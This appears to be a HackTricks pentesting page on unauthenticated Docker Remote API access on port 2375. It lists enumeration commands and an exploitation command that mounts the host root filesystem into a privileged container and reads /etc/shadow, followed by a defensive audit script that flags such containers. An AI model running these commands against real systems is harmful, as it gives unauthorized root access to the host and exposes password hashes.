hacktricks/pentesting/2375-pentesting-docker.md
2020-12-15 09:18:43 +00:00


2375 Pentesting Docker

2375 - Pentesting Docker API

Basic Information

When enabled, the Docker Remote API listens on port 2375 by default. By default the service does not require authentication, which allows an attacker to start a privileged Docker container. Using the Remote API, one can attach the host's / (root) directory to the container and read or write files in the host's environment.

Default port: 2375

PORT    STATE SERVICE
2375/tcp open  docker

Enumeration

msf> use exploit/linux/http/docker_daemon_tcp
nmap -sV --script "docker-*" -p <PORT> <IP>

Exploitation

Check whether it is vulnerable to arbitrary code execution:

docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
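
On the defending side, the container started by the command above leaves a recognisable footprint in `docker inspect` output: `HostConfig.Privileged`, `HostConfig.NetworkMode` set to `host`, and a bind mount of the host's `/`. The following audit script is an added example, not part of the original page; the sample JSON is constructed and the list of sensitive host paths is an assumption to adapt.

```python
import json

# Constructed sample shaped like `docker inspect` output (not from a real host).
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web",
     "HostConfig": {"Privileged": False, "NetworkMode": "bridge"},
     "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html", "RW": False}]},
    {"Name": "/suspicious",
     "HostConfig": {"Privileged": True, "NetworkMode": "host"},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}]},
    {"Name": "/agent",
     "HostConfig": {"Privileged": False, "NetworkMode": "bridge"},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock", "RW": True},
                {"Type": "volume", "Source": "/var/lib/docker/volumes/data/_data", "Destination": "/data", "RW": True}]},
])

# Host paths whose bind mount hands a container control of the host (assumed list).
SENSITIVE_SOURCES = ("/", "/etc", "/root", "/var/run/docker.sock", "/run/docker.sock")


def audit_container(container):
    """Return the risky settings found on one inspected container."""
    host_config = container.get("HostConfig") or {}
    findings = []
    if host_config.get("Privileged"):
        findings.append("privileged")
    if host_config.get("NetworkMode") == "host":
        findings.append("host-network")
    for mount in container.get("Mounts") or []:
        if mount.get("Type") != "bind":
            continue  # named volumes do not expose arbitrary host paths
        source = (mount.get("Source") or "").rstrip("/") or "/"
        if source in SENSITIVE_SOURCES:
            mode = "rw" if mount.get("RW") else "ro"
            findings.append("bind:%s(%s)" % (source, mode))
    return findings


def audit(inspect_json):
    """Map container name -> findings, for containers with at least one finding."""
    report = {}
    for container in json.loads(inspect_json):
        findings = audit_container(container)
        if findings:
            report[container.get("Name", "?").lstrip("/")] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_INSPECT).items():
        print(name + ": " + ", ".join(findings))
```

On a real host, pass the JSON printed by `docker inspect` for the running containers to `audit()` in place of the constructed sample.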